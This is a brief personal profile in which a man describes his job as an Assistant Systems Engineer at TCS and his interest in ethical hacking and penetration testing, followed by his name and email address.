About me: I, Kaleem Shaik, am working as an ASE (Assistant Systems Engineer) in TCS. My areas of interest are Ethical Hacking, Penetration Testing and anything and everything in relation to SECURITY.
Contact Details:
Name: Kaleem Shaik
Email: kaleemshaik786@hotmail.com
Thanks & Regards
Kaleem Shaik